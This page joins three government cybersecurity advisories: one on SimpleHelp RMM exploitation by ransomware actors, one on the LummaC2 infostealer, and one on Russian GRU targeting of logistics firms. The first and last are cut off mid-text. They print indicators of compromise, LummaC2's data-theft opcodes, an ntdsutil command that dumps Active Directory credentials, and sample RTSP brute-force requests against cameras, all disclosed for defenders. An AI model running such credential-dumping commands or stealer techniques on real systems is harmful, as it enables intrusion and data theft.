Flux RSS

Summary The Cybersecurity and Infrastructure Security Agency (CISA) is releasing this advisory in response to ransomware actors leveraging unpatched instances of a vulnerability in SimpleHelp Remote Monitoring and Management (RMM) to compromise customers of a utility billing software provider. This incident reflects a broader pattern of ransomware actors targeting organizations through unpatched versions of SimpleHelp RMM since January 2025. SimpleHelp versions 5.5.7 and earlier contain several vulnerabilities, including CVE-2024-57727—a path traversal vulnerability.1 Ransomware actors likely leveraged CVE-2024-57727 to access downstream customers’ unpatched SimpleHelp RMM for disruption of services in double extortion compromises.1 CISA added CVE-2024-57727 to its Known Exploited Vulnerabilities (KEV) Catalog on Feb. 13, 2025. CISA urges software vendors, downstream customers, and end users to immediately implement the Mitigations listed in this advisory based on confirmed compromise or risk of compromise. Download the PDF version of this report: AA25-163A Ransomware Actors Exploit Unpatched SimpleHelp Remote Monitoring and Management to Compromise Utility Billing Software Provider (PDF, 420.49 KB ) Mitigations CISA recommends organizations implement the mitigations below to respond to emerging ransomware activity exploiting SimpleHelp software. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections. These mitigations apply to all critical infrastructure organizations. Vulnerable Third-Party Vendors If SimpleHelp is embedded or bundled in vendor-owned software or if a third-party service provider leverages SimpleHelp on a downstream customer’s network, then identify the SimpleHelp server version at the top of the file /SimpleHelp/configuration/serverconfig.xml. If version 5.5.7 or prior is found or has been used since January 2025, third-party vendors should: Isolate the SimpleHelp server instance from the internet or stop the server process. Upgrade immediately to the latest SimpleHelp version in accordance with SimpleHelp’s security vulnerability advisory.2 Contact your downstream customers to direct them to take actions to secure their endpoints and undertake threat hunting actions on their network. Vulnerable Downstream Customers and End Users Determine if the system is running an unpatched version of SimpleHelp RMM either directly or embedded in third-party software. SimpleHelp Endpoints Determine if an endpoint is running the remote access (RAS) service by checking the following paths depending on the specific environment: Windows: %APPDATA%\JWrapper-Remote Access Linux: /opt/JWrapper-Remote Access MacOs: /Library/Application Support/JWrapper-Remote Access If RAS installation is present and running, open the serviceconfig.xml file in /JWrapper-Remote Access/JWAppsSharedConfig/ to determine if the registered service is vulnerable. The lines starting with

Summary The Federal Bureau of Investigation (FBI) and the Cybersecurity and Infrastructure Security Agency (CISA) are releasing this joint advisory to disseminate known tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) associated with threat actors deploying the LummaC2 information stealer (infostealer) malware. LummaC2 malware is able to infiltrate victim computer networks and exfiltrate sensitive information, threatening vulnerable individuals’ and organizations’ computer networks across multiple U.S. critical infrastructure sectors. According to FBI information and trusted third-party reporting, this activity has been observed as recently as May 2025. The IOCs included in this advisory were associated with LummaC2 malware infections from November 2023 through May 2025. The FBI and CISA encourage organizations to implement the recommendations in the Mitigations section of this advisory to reduce the likelihood and impact of LummaC2 malware. Download the PDF version of this report: AA25-141B Threat Actors Deploy LummaC2 Malware to Exfiltrate Sensitive Data from Organizations (PDF, 1.28 MB ) For a downloadable copy of IOCs, see: AA25-141B STIX XML (XML, 146.54 KB ) AA25-141B STIX JSON (JSON, 300.90 KB ) Technical Details Note: This advisory uses the MITRE ATT&CK® Matrix for Enterprise framework, version 17. See the MITRE ATT&CK Tactics and Techniques section of this advisory for threat actor activity mapped to MITRE ATT&CK tactics and techniques. Overview LummaC2 malware first appeared for sale on multiple Russian-language speaking cybercriminal forums in 2022. Threat actors frequently use spearphishing hyperlinks and attachments to deploy LummaC2 malware payloads [T1566.001, T1566.002]. Additionally, threat actors rely on unsuspecting users to execute the payload by clicking a fake Completely Automated Public Turing Test to tell Computers and Humans Apart (CAPTCHA). The CAPTCHA contains instructions for users to then open the Windows Run window (Windows Button + R) and paste clipboard contents (“CTRL + V”). After users press “enter” a subsequent Base64-encoded PowerShell process is executed. To obfuscate their operations, threat actors have embedded and distributed LummaC2 malware within spoofed or fake popular software (i.e., multimedia player or utility software) [T1036]. The malware’s obfuscation methods allow LummaC2 actors to bypass standard cybersecurity measures, such as Endpoint Detection and Response (EDR) solutions or antivirus programs, designed to flag common phishing attempts or drive-by downloads [T1027]. Once a victim’s computer system is infected, the malware can exfiltrate sensitive user information, including personally identifiable information, financial credentials, cryptocurrency wallets, browser extensions, and multifactor authentication (MFA) details without immediate detection [TA0010, T1119]. Private sector statistics indicate there were more than 21,000 market listings selling LummaC2 logs on multiple cybercriminal forums from April through June of 2024, a 71.7 percent increase from April through June of 2023. File Execution Upon execution, the LummaC2.exe file will enter its main routine, which includes four sub-routines (see Figure 1). Figure 1. LummaC2 Main Routine The first routine decrypts strings for a message box that is displayed to the user (see Figure 2). Figure 2. Message Box If the user selects No, the malware will exit. If the user selects Yes, the malware will move on to its next routine, which decrypts its callback Command and Control (C2) domains [T1140]. A list of observed domains is included in the Indicators of Compromise section. After each domain is decoded, the implant will attempt a POST request [T1071.001] (see Figure 3). Figure 3. Post Request If the POST request is successful, a pointer to the decoded domain string is saved in a global variable for later use in the main C2 routine used to retrieve JSON formatted commands (see Figure 4). Figure 4. Code Saving Successful Callback Request Once a valid C2 domain is contacted and saved, the malware moves on to the next routine, which queries the user’s name and computer name utilizing the Application Programming Interfaces (APIs) GetUserNameW and GetComputerNameW respectively [T1012]. The returned data is then hashed and compared against a hard-coded hash value (see Figure 5). Figure 5. User and Computer Name Check The hashing routine was not identified as a standard algorithm; however, it is a simple routine that converts a Unicode string to a 32-bit hexadecimal value. If the username hash is equal to the value 0x56CF7626, then the computer name is queried. If the computer name queried is seven characters long, then the name is hashed and checked against the hard-coded value of 0xB09406C7. If both values match, a final subroutine will be called with a static value of the computer name hash as an argument. If this routine is reached, the process will terminate. This is most likely a failsafe to prevent the malware from running on the attacker’s system, as its algorithms are one-way only and will not reveal information on the details of the attacker’s own hostname and username. If the username and hostname check function returns zero (does not match the hard-coded values), the malware will enter its main callback routine. The LummaC2 malware will contact the saved hostname from the previous check and send the following POST request (see Figure 6). Figure 6. Second POST Request The data returned from the C2 server is encrypted. Once decoded, the C2 data is in a JSON format and is parsed by the LummaC2 malware. The C2 uses the JSON configuration to parse its browser extensions and target lists using the ex key, which contains an array of objects (see Figure 7). Figure 7. Parsing of ex JSON Value Parsing the c key contains an array of objects, which will give the implant its C2 (see Figure 8). Figure 8. Parsing of c JSON Value C2 Instructions Each array object that contains the JSON key value of t will be evaluated as a command opcode, resulting in the C2 instructions in the subsections below. 1. Opcode 0 – Steal Data Generic This command allows five fields to be defined when stealing data, offering the most flexibility. The Opcode O command option allows LummaC2 affiliates to add their custom information gathering details (see Table 1). Table 2. Opcode 1 Options Key Value p Path to steal from m File extensions to read z Output directory to store stolen data d Depth of recursiveness fs Maximum file size 2. Opcode 1 – Steal Browser Data This command only allows for two options: a path and the name of the output directory. This command, based on sample configuration downloads, is used for browser data theft for everything except Mozilla [T1217] (see Table 2). Table 2. Opcode 1 Options Key Value p Path to steal from z Name of Browser – Output 3. Opcode 2 – Steal Browser Data (Mozilla) This command is identical to Opcode 1; however, this option seems to be utilized solely for Mozilla browser data (see Table 3). Table 3. Opcode 2 Options Key Value p Path to steal from z Name of Browser – Output 4. Opcode 3 – Download a File This command contains three options: a URL, file extension, and execution type. The configuration can specify a remote file with u to download and create the extension specified in the ft key [T1105] (see Table 4). Table 4. Opcode 3 Options Key Value u URL for Download ft File Extension e Execution Type The e value can take two values: 0 or 1. This specifies how to execute the downloaded file either with the LoadLibrary API or via the command line with rundll32.exe [T1106] (see Table 5). Table 5. Execution Types Key Value e=0 Execute with LoadLibraryW() e=1 Executive with rund1132.exe 5. Take Screenshot If the configuration JSON file has a key of “se” and its value is “true,” the malware will take a screenshot in BMP format and upload it to the C2 server. 6. Delete Self If the configuration JSON file has a key of “ad” and its value is “true,” the malware will enter a routine to delete itself. The command shown in Figure 9 will be decoded and executed for self-deletion. Figure 9. Self-Deletion Command Line Figure 10 depicts the above command line during execution. Figure 10. Decoded Command Line in Memory Host Modifications Without any C2 interactions, the LummaC2 malware does not create any files on the infected drive. It simply runs in memory, gathers system information, and exfiltrates it to the C2 server [T1082]. The commands returned from the C2 server could indicate that it drops additional files and/or saves data to files on the local hard drive. This is variable, as these commands come from the C2 server and are mutable. Decrypted Strings Below is a list of hard-coded decrypted strings located in the binary (see Figure 11). Figure 11. Decoded Strings Indicators of Compromise See Table 6 and Table 7 for LummaC2 IOCs obtained by the FBI and trusted third parties. Disclaimer: The authoring agencies recommend organizations investigate and vet these indicators of compromise prior to taking action, such as blocking. Table 6. LummaC2 Executable Hashes Executables Type 4AFDC05708B8B39C82E60ABE3ACE55DB (LummaC2.exe from November 2023) MD5 E05DF8EE759E2C955ACC8D8A47A08F42 (LummaC2.exe from November 2023) MD5 C7610AE28655D6C1BCE88B5D09624FEF MD5 1239288A5876C09D9F0A67BCFD645735168A7C80 (LummaC2.exe from November 2023) SHA1 B66DA4280C6D72ADCC68330F6BD793DF56A853CB (LummaC2.exe from November 2023) SHA1 3B267FA5E1D1B18411C22E97B367258986E871E5 TLSH 19CC41A0A056E503CC2137E19E952814FBDF14F8D83F799AEA9B96ABFF11EFBB (November 2023) SHA256 2F31D00FEEFE181F2D8B69033B382462FF19C35367753E6906ED80F815A7924F (LummaC2.exe from November 2023) SHA256 4D74F8E12FF69318BE5EB383B4E56178817E84E83D3607213160276A7328AB5D SHA256 325daeb781f3416a383343820064c8e98f2e31753cd71d76a886fe0dbb4fe59a SHA256 76e4962b8ccd2e6fd6972d9c3264ccb6738ddb16066588dfcb223222aaa88f3c SHA256 7a35008a1a1ae3d093703c3a34a21993409af42eb61161aad1b6ae4afa8bbb70 SHA256 a9e9d7770ff948bb65c0db24431f75dd934a803181afa22b6b014fac9a162dab SHA256 b287c0bc239b434b90eef01bcbd00ff48192b7cbeb540e568b8cdcdc26f90959 SHA256 ca47c8710c4ffb4908a42bd986b14cddcca39e30bb0b11ed5ca16fe8922a468b SHA256 Table 7. LummaC2 DLL Binaries DLL Binaries Type iphlpapi.dll IP Helper API winhttp.dll Windows HTTP Services The following are domains observed deploying LummaC2 malware. Disclaimer: The domains below are historical in nature and may not currently be malicious. Pinkipinevazzey[.]pw Fragnantbui[.]shop Medicinebuckerrysa[.]pw Musicallyageop[.]pw stogeneratmns[.]shop wallkedsleeoi[.]shop Tirechinecarpet[.]pw reinforcenh[.]shop reliabledmwqj[.]shop Musclefarelongea[.]pw Forbidstow[.]site gutterydhowi[.]shop Fanlumpactiras[.]pw Computeryrati[.]site Contemteny[.]site Ownerbuffersuperw[.]pw Seallysl[.]site Dilemmadu[.]site Freckletropsao[.]pw Opposezmny[.]site Faulteyotk[.]site Hemispheredodnkkl[.]pw Goalyfeastz[.]site Authorizev[.]site ghostreedmnu[.]shop Servicedny[.]site blast-hubs[.]com offensivedzvju[.]shop friendseforever[.]help blastikcn[.]com vozmeatillu[.]shop shiningrstars[.]help penetratebatt[.]pw drawzhotdog[.]shop mercharena[.]biz pasteflawwed[.]world generalmills[.]pro citywand[.]live hoyoverse[.]blog nestlecompany[.]pro esccapewz[.]run dsfljsdfjewf[.]info naturewsounds[.]help travewlio[.]shop decreaserid[.]world stormlegue[.]com touvrlane[.]bet governoagoal[.]pw paleboreei[.]biz calmingtefxtures[.]run foresctwhispers[.]top tracnquilforest[.]life sighbtseeing[.]shop advennture[.]top collapimga[.]fun holidamyup[.]today pepperiop[.]digital seizedsentec[.]online triplooqp[.]world easyfwdr[.]digital strawpeasaen[.]fun xayfarer[.]live jrxsafer[.]top quietswtreams[.]life oreheatq[.]live plantainklj[.]run starrynsightsky[.]icu castmaxw[.]run puerrogfh[.]live earthsymphzony[.]today weldorae[.]digital quavabvc[.]top citydisco[.]bet steelixr[.]live furthert[.]run featureccus[.]shop smeltingt[.]run targett[.]top mrodularmall[.]top ferromny[.]digital ywmedici[.]top jowinjoinery[.]icu rodformi[.]run legenassedk[.]top htardwarehu[.]icu metalsyo[.]digital ironloxp[.]live cjlaspcorne[.]icu navstarx[.]shop bugildbett[.]top latchclan[.]shop spacedbv[.]world starcloc[.]bet rambutanvcx[.]run galxnetb[.]today pomelohgj[.]top scenarisacri[.]top jawdedmirror[.]run changeaie[.]top lonfgshadow[.]live liftally[.]top nighetwhisper[.]top salaccgfa[.]top zestmodp[.]top owlflright[.]digital clarmodq[.]top piratetwrath[.]run hemispherexz[.]top quilltayle[.]live equatorf[.]run latitudert[.]live longitudde[.]digital climatologfy[.]top starofliught[.]top MITRE ATT&CK Tactics and Techniques See Table 8 through Table 13 for all referenced threat actor tactics and techniques in this advisory. For assistance with mapping malicious cyber activity to the MITRE ATT&CK framework, see CISA and MITRE ATT&CK’s Best Practices for MITRE ATT&CK Mapping and CISA’s Decider Tool. Table 8. Initial Access Technique Title ID Use Phishing T1566 Threat actors delivered LummaC2 malware through phishing emails. Phishing: Spearphishing Attachment T1566.001 Threat actors used spearphishing attachments to deploy LummaC2 malware payloads. Phishing: Spearphishing Link T1566.002 Threat actors used spearphishing hyperlinks to deploy LummaC2 malware payloads. Table 9. Defense Evasion Technique Title ID Use Obfuscated Files or Information T1027 Threat actors obfuscated the malware to bypass standard cybersecurity measures designed to flag common phishing attempts or drive-by downloads. Masquerading T1036 Threat actors delivered LummaC2 malware via spoofed software. Deobfuscate/Decode Files or Information T1140 Threat actors used LummaC2 malware to decrypt its callback C2 domains. Table 10. Discovery Technique Title ID Use Query Registry T1012 Threat actors used LummaC2 malware to query the user’s name and computer name utilizing the APIs GetUserNameW and GetComputerNameW. Browser Information Discovery T1217 Threat actors used LummaC2 malware to steal browser data. Table 11. Collection Technique Title ID Use Automated Collection T1119 LummaC2 malware has automated collection of various information including cryptocurrency wallet details. Table 12. Command and Control Technique Title ID Use Application Layer Protocol: Web Protocols T1071.001 Threat actors used LummaC2 malware to attempt POST requests. Ingress Tool Transfer T1105 Threat actors used LummaC2 malware to transfer a remote file to compromised systems. Table 13. Exfiltration Technique Title ID Use Exfiltration TA0010 Threat actors used LummaC2 malware to exfiltrate sensitive user information, including traditional credentials, cryptocurrency wallets, browser extensions, and MFA details without immediate detection. Native API T1106 Threat actors used LummaC2 malware to download files with native OS APIs. Mitigations The FBI and CISA recommend organizations implement the mitigations below to reduce the risk of compromise by LummaC2 malware. These mitigations align with the Cross-Sector Cybersecurity Performance Goals (CPGs) developed by CISA and the National Institute of Standards and Technology (NIST). The CPGs provide a minimum set of practices and protections that CISA and NIST recommend all organizations implement. CISA and NIST based the CPGs on existing cybersecurity frameworks and guidance to protect against the most common and impactful threats, tactics, techniques, and procedures. Visit CISA’s CPGs webpage for more information on the CPGs, including additional recommended baseline protections. These mitigations apply to all critical infrastructure organizations. Separate User and Privileged Accounts: Allow only necessary users and applications access to the registry [CPG 2.E]. Monitor and detect suspicious behavior during exploitation [CPG 3.A]. Monitor and detect suspicious behavior, creation and termination events, and unusual and unexpected processes running. Monitor API calls that may attempt to retrieve system information. Analyze behavior patterns from process activities to identify anomalies. For more information, visit CISA’s guidance on: Enhanced Visibility and Hardening Guidance for Communications Infrastructure. Implement application controls to manage and control execution of software, including allowlisting remote access programs. Application controls should prevent installation and execution of portable versions of unauthorized remote access and other software. A properly configured application allowlisting solution will block any unlisted application execution. Allowlisting is important because antivirus solutions may fail to detect the execution of malicious portable executables when the files use any combination of compression, encryption, or obfuscation. Protect against threat actor phishing campaigns by implementing CISA’s Phishing Guidance and Phishing-resistant multifactor authentication. [CPG 2.H] Log Collection: Regularly monitoring and reviewing registry changes and access logs can support detection of LummaC2 malware [CPG 2.T]. Implement authentication, authorization, and accounting (AAA) systems [M1018] to limit actions users can perform and review logs of user actions to detect unauthorized use and abuse. Apply principles of least privilege to user accounts and groups, allowing only the performance of authorized actions. Audit user accounts and revoke credentials for departing employees, removing those that are inactive or unnecessary on a routine basis [CPG 2.D]. Limit the ability for user accounts to create additional accounts. Keep systems up to date with regular updates, patches, hot fixes, and service packs that may minimize vulnerabilities. Learn more by visiting CISA’s webpage: Secure our World Update Software. Secure network devices to restrict command line access. Learn more about defending against the malicious use of remote access software by visiting CISA’s Guide to Securing Remote Access Software. Use segmentation to prevent access to sensitive systems and information, possibly with the use of Demilitarized Zone (DMZ) or virtual private cloud (VPC) instances to isolate systems [CPG 2.F]. Monitor and detect API usage, looking for unusual or malicious behavior. Validate Security Controls In addition to applying mitigations, the FBI and CISA recommend exercising, testing, and validating your organization’s security program against threat behaviors mapped to the MITRE ATT&CK Matrix for Enterprise framework in this advisory. The FBI and CISA recommend testing your existing security controls inventory to assess performance against the ATT&CK techniques described in this advisory. To get started: Select an ATT&CK technique described in this advisory (see Table 8 through Table 13). Align your security technologies against the technique. Test your technologies against the technique. Analyze your detection and prevention technologies’ performance. Repeat the process for all security technologies to obtain a set of comprehensive performance data. Tune your security program, including people, processes, and technologies, based on the data generated by this process. The FBI and CISA recommend continually testing your security program, at scale, in a production environment to ensure optimal performance against the MITRE ATT&CK techniques identified in this advisory. Reporting Your organization has no obligation to respond or provide information to the FBI in response to this joint advisory. If, after reviewing the information provided, your organization decides to provide information to the FBI, reporting must be consistent with applicable state and federal laws. The FBI is interested in any information that can be shared, to include the status and scope of infection, estimated loss, date of infection, date detected, initial attack vector, and host- and network-based indicators. To report information, please contact the FBI’s Internet Crime Complaint Center (IC3), your local FBI field office, or CISA’s 24/7 Operations Center at report@cisa.gov or (888) 282-0870. Disclaimer The information in this report is being provided “as is” for informational purposes only. The FBI and CISA do not endorse any commercial entity, product, company, or service, including any entities, products, or services linked within this document. Any reference to specific commercial entities, products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply endorsement, recommendation, or favor by the FBI and CISA. Acknowledgements ReliaQuest contributed to this advisory. Version History May 21, 2025: Initial version.

Executive Summary This joint cybersecurity advisory (CSA) highlights a Russian state-sponsored cyber campaign targeting Western logistics entities and technology companies. This includes those involved in the coordination, transport, and delivery of foreign assistance to Ukraine. Since 2022, Western logistics entities and IT companies have faced an elevated risk of targeting by the Russian General Staff Main Intelligence Directorate (GRU) 85th Main Special Service Center (85th GTsSS), military unit 26165—tracked in the cybersecurity community under several names (see “Cybersecurity Industry Tracking”). The actors’ cyber espionage-oriented campaign, targeting technology companies and logistics entities, uses a mix of previously disclosed tactics, techniques, and procedures (TTPs). The authoring agencies expect similar targeting and TTP use to continue. Executives and network defenders at logistics entities and technology companies should recognize the elevated threat of unit 26165 targeting, increase monitoring and threat hunting for known TTPs and indicators of compromise (IOCs), and posture network defenses with a presumption of targeting. This cyber espionage-oriented campaign targeting logistics entities and technology companies uses a mix of previously disclosed TTPs and is likely connected to these actors’ wide scale targeting of IP cameras in Ukraine and bordering NATO nations. The following authors and co-sealers are releasing this CSA: United States National Security Agency (NSA) United States Federal Bureau of Investigation (FBI) United Kingdom National Cyber Security Centre (NCSC-UK) Germany Federal Intelligence Service (BND) Bundesnachrichtendienst Germany Federal Office for Information Security (BSI) Bundesamt für Sicherheit in der Informationstechnik Germany Federal Office for the Protection of the Constitution (BfV) Bundesamt für Verfassungsschutz Czech Republic Military Intelligence (VZ) Vojenské zpravodajství Czech Republic National Cyber and Information Security Agency (NÚKIB) Národní úřad pro kybernetickou a informační bezpečnost Czech Republic Security Information Service (BIS) Bezpečnostní informační služba Poland Internal Security Agency (ABW) Agencja Bezpieczeństwa Wewnętrznego Poland Military Counterintelligence Service (SKW) Służba Kontrwywiadu Wojskowego United States Cybersecurity and Infrastructure Security Agency (CISA) United States Department of Defense Cyber Crime Center (DC3) United States Cyber Command (USCYBERCOM) Australian Signals Directorate’s Australian Cyber Security Centre (ASD’s ACSC) Canadian Centre for Cyber Security (CCCS) Danish Defence Intelligence Service (DDIS) Forsvarets Efterretningstjeneste Estonian Foreign Intelligence Service (EFIS) Välisluureamet Estonian National Cyber Security Centre (NCSC-EE) Küberturvalisuse keskus French Cybersecurity Agency (ANSSI) Agence nationale de la sécurité des systèmes d'information Netherlands Defence Intelligence and Security Service (MIVD) Militaire Inlichtingen- en Veiligheidsdienst Download the PDF version of this report: Russian GRU Targeting Western Logistics Entities and Technology Companies (PDF, 1,081KB) For a downloadable list of IOCs, visit: AA25-141A STIX XML (XML, 117.02 KB ) AA25-141A STIX JSON (JSON, 144.29 KB ) Introduction For over two years, the Russian GRU 85th GTsSS, military unit 26165—commonly known in the cybersecurity community as APT28, Fancy Bear, Forest Blizzard, BlueDelta, and a variety of other identifiers—has conducted this campaign using a mix of known tactics, techniques, and procedures (TTPs), including reconstituted password spraying capabilities, spearphishing, and modification of Microsoft Exchange mailbox permissions. In late February 2022, multiple Russian state-sponsored cyber actors increased the variety of cyber operations for purposes of espionage, destruction, and influence—with unit 26165 predominately involved in espionage. [1] As Russian military forces failed to meet their military objectives and Western countries provided aid to support Ukraine’s territorial defense, unit 26165 expanded its targeting of logistics entities and technology companies involved in the delivery of aid. These actors have also targeted Internet-connected cameras at Ukrainian border crossings to monitor and track aid shipments. Note: This advisory uses the MITRE ATT&CK® for Enterprise framework, version 17. See Appendix A: MITRE ATT&CK tactics and techniques for a table of the threat actors’ activity mapped to MITRE ATT&CK tactics and techniques. This advisory uses the MITRE D3FEND® framework, version 1.0. Description of Targets The GRU unit 26165 cyber campaign against Western logistics providers and technology companies has targeted dozens of entities, including government organizations and private/commercial entities across virtually all transportation modes: air, sea, and rail. These actors have targeted entities associated with the following verticals within NATO member states, Ukraine, and at international organizations: Defense Industry Transportation and Transportation Hubs (ports, airports, etc.) Maritime Air Traffic Management IT Services In the course of the targeting lifecycle, unit 26165 actors identified and conducted follow-on targeting of additional entities in the transportation sector that had business ties to the primary target, exploiting trust relationships to attempt to gain additional access [T1199]. The actors also conducted reconnaissance on at least one entity involved in the production of industrial control system (ICS) components for railway management, though a successful compromise was not confirmed [TA0043]. The countries with targeted entities include the following, as illustrated in Figure 1: Bulgaria Czech Republic France Germany Greece Italy Moldova Netherlands Poland Romania Slovakia Ukraine United States Figure 1: Countries with Targeted Entities Initial Access TTPs To gain initial access to targeted entities, unit 26165 actors used several techniques to gain initial access to targeted entities, including (but not limited to): Credential guessing [T1110.001] / brute force [T1110.003] Spearphishing for credentials [T1566] Spearphishing delivering malware [T1566] Outlook NTLM vulnerability (CVE-2023-23397) Roundcube vulnerabilities (CVE-2020-12641, CVE-2020-35730, CVE-2021-44026) Exploitation of Internet-facing infrastructure, including corporate VPNs [T1133], via public vulnerabilities and SQL injection [T1190] Exploitation of WinRAR vulnerability (CVE-2023-38831) The actors abused vulnerabilities associated with a range of brands and models of small office/home office (SOHO) devices to facilitate covert cyber operations, as well as proxy malicious activity via devices with geolocation in proximity to the target [T1665]. [2] Credential Guessing/Brute Force Unit 26165 actors’ credential guessing [T1110.001] operations in this campaign exhibit some similar characteristics to those disclosed in the previous CSA “Russian GRU Conducting Global Brute Force Campaign to Compromise Enterprise and Cloud Environments.” [3] Based on victim network investigations, the current iteration of this TTP employs a similar blend of anonymization infrastructure, including the use of Tor and commercial VPNs [T1090.003]. The actors frequently rotated the IP addresses used to further hamper detection. All observed connections were made via encrypted TLS [T1573]. Spearphishing GRU unit 26165 actors’ spearphishing emails included links [T1566.002] leading to fake login pages impersonating a variety of government entities and Western cloud email providers’ webpages. These webpages were typically hosted on free third-party services or compromised SOHO devices and often used legitimate documents associated with thematically similar entities as lures. The subjects of spearphishing emails were diverse and ranged from professional topics to adult themes. Phishing emails were frequently sent via compromised accounts or free webmail accounts [T1586.002, T1586.003]. The emails were typically written in the target’s native language and sent to a single targeted recipient. Some campaigns employed multi-stage redirectors [T1104] verifying IP-geolocation [T1627.001] and browser fingerprints [T1627] to protect credential harvesting infrastructure or provide multifactor authentication (MFA) [T1111] and CAPTCHA relaying capabilities [T1056]. Connecting endpoints failing the location checks were redirected to a benign URL [T1627], such as msn.com. Redirector services used include: Webhook[.]site FrgeIO InfinityFree Dynu Mocky Pipedream Mockbin[.]org The actors also used spearphishing to deliver malware (including HEADLACE and MASEPIE) executables [T1204.002] delivered via third-party services and redirectors [T1566.002], scripts in a mix of languages [T1059] (including BAT [T1059.003] and VBScript [T1059.005]) and links to hosted shortcuts [T1204.001]. CVE Usage Throughout this campaign, GRU unit 26165 weaponized an Outlook NTLM vulnerability (CVE-2023-23397) to collect NTLM hashes and credentials via specially crafted Outlook calendar appointment invitations [T1187]. [4],[5] These actors also used a series of Roundcube CVEs (CVE-2020-12641, CVE-2020-35730, and CVE-2021-44026) to execute arbitrary shell commands [T1059], gain access to victim email accounts, and retrieve sensitive data from email servers [T1114]. Since at least fall 2023, the actors leveraged a WinRAR vulnerability (CVE-2023-38831) allowing for the execution of arbitrary code embedded in an archive as a means of initial access [T1659]. The actors sent emails with malicious attachments [T1566.001] or embedded hyperlinks [T1566.002] that downloaded a malicious archive prepared using this CVE. Post-Compromise TTPs After an initial compromise using one of the above techniques, unit 26165 actors conducted contact information reconnaissance to identify additional targets in key positions [T1589.002]. The actors also conducted reconnaissance of the cybersecurity department [T1591], individuals responsible for coordinating transport [T1591.004], and other companies cooperating with the victim entity [T1591.002]. The actors used native commands and open source tools, such as Impacket and PsExec, to move laterally within the environment [TA0008]. Multiple Impacket scripts were used as .exe files, in addition to the python versions, depending on the victim environment. The actors also moved laterally within the network using Remote Desktop Protocol (RDP) [T1021.001] to access additional hosts and attempt to dump Active Directory NTDS.dit domain databases [T1003.003] using native Active Directory Domain Services commands, such as in Figure 2: Example Active Directory Domain Services command: Figure 2: Example Active Directory Domain Services command C:\Windows\system32\ntdsutil.exe "activate instance ntds" ifm "create full C:\temp\[a-z]{3}" quit quit Additionally, GRU unit 26165 actors used the tools Certipy and ADExplorer.exe to exfiltrate information from the Active Directory. The actors installed python [T1059.006] on infected machines to enable the execution of Certipy. Accessed files were archived in .zip files prior to exfiltration [T1560]. The actors attempted to exfiltrate archived data via a previously dropped OpenSSH binary [T1048]. Incident response investigations revealed that the actors would take steps to locate and exfiltrate lists of Office 365 users and set up sustained email collection. The actors used manipulation of mailbox permissions [T1098.002] to establish sustained email collection at compromised logistics entities, as detailed in a Polish Cybercommand blog. [6] After initial authentication, unit 26165 actors would change accounts' folder permissions and enroll compromised accounts in MFA mechanisms to increase the trust-level of compromised accounts and enable sustained access [T1556.006]. The actors leveraged python scripts to retrieve plaintext passwords via Group Policy Preferences [T1552.006] using Get-GPPPassword.py and a modified ldap-dump.py to enumerate the Windows environment [T1087.002] and conduct a brute force password spray [T1110.003] via Lightweight Directory Access Protocol (LDAP). The actors would additionally delete event logs through the wevtutil utility [T1070.001]. After gaining initial access to the network, the actors pursued further access to accounts with access to sensitive information on shipments, such as train schedules and shipping manifests. These accounts contained information on aid shipments to Ukraine, including: sender, recipient, train/plane/ship numbers, point of departure, destination, container registration numbers, travel route, and cargo contents. In at least one instance, the actors attempted to use voice phishing [T1566.004] to gain access to privileged accounts by impersonating IT staff. Malware Unit 26165’s use of malware in this campaign ranged from gaining initial access to establishing persistence and exfiltrating data. In some cases, the attack chain resulted in multiple pieces of malware being deployed in succession. The actors used dynamic link library (DLL) search order hijacking [T1574.001] to facilitate malware execution. There were a number of known malware variants tied to this campaign against logistics sector victims, including: HEADLACE [7] MASEPIE [8] While other malware variants, such as OCEANMAP and STEELHOOK, [8] were not directly observed targeting logistics or IT entities, their deployment against victims in other sectors in Ukraine and other Western countries suggest that they could be deployed against logistics and IT entities should the need arise. Persistence In addition to the abovementioned mailbox permissions abuse, unit 26165 actors also used scheduled tasks [T1053.005], run keys [T1547.001], and placed malicious shortcuts [T1547.009] in the startup folder to establish persistence. Exfiltration GRU unit 26165 actors used a variety of methods for data exfiltration that varied based on the victim environment, including both malware and living off the land binaries. PowerShell commands [T1059.001] were often used to prepare data for exfiltration; for example, the actors prepared zip archives [T1560.001] for upload to their own infrastructure. The actors also used server data exchange protocols and Application Programming Interfaces (APIs) such as Exchange Web Services (EWS) and Internet Message Access Protocol (IMAP) [T1114.002] to exfiltrate data from email servers. In multiple instances, the actors used periodic EWS queries [T1119] to collect new emails sent and received since the last data exfiltration [T1029]. The actors typically used infrastructure in close geographic proximity to the victim. Long gaps between exfiltration, the use of trusted and legitimate protocols, and the use of local infrastructure allowed for long-term collection of sensitive data to go undetected. Connections to Targeting of IP Cameras In addition to targeting logistics entities, unit 26165 actors likely used access to private cameras at key locations, such as near border crossings, military installations, and rail stations, to track the movement of materials into Ukraine. The actors also used legitimate municipal services, such as traffic cams. The actors targeted Real Time Streaming Protocol (RTSP) servers hosting IP cameras primarily located in Ukraine as early as March 2022 in a large-scale campaign, which included attempts to enumerate devices [T1592] and gain access to the cameras’ feeds [T1125]. Actor-controlled servers sent RTSP DESCRIBE requests destined for RTSP servers, primarily hosting IP cameras [T1090.002]. The DESCRIBE requests were crafted to obtain access to IP cameras located on logically distinct networks from that of the routers that received the request. The requests included Base64-encoded credentials for the RTSP server, which included publicly documented default credentials and likely generic attempts to brute force access to the devices [T1110]. An example of an RTSP request is shown in Figure 3. Figure 3: Example RTSP request DESCRIBE rtsp://[IP ADDRESS] RTSP/1.0 CSeq: 1 Authorization: Basic User-Agent: WebClient Accept: application/sdp DESCRIBE rtsp://[IP ADDRESS] RTSP/1.0 CSeq: 2 Authorization: Digest username="admin", realm="[a-f0-9]{12}", algorithm="MD5", nonce="[a-f0-9]{32}", uri="", response="[a-f0-9]{32}" User-Agent: WebClient Accept: application/sdp Successful RTSP 200 OK responses contained a snapshot of the IP camera's image and IP camera metadata such as video codec, resolution, and other properties depending on the IP camera's configuration. From a sample available to the authoring agencies of over 10,000 cameras targeted via this effort, the geographic distribution of victims showed a strong focus on cameras in Ukraine and border countries, as shown in Table 1: Table 1: Geographic distribution of targeted IP cameras Country 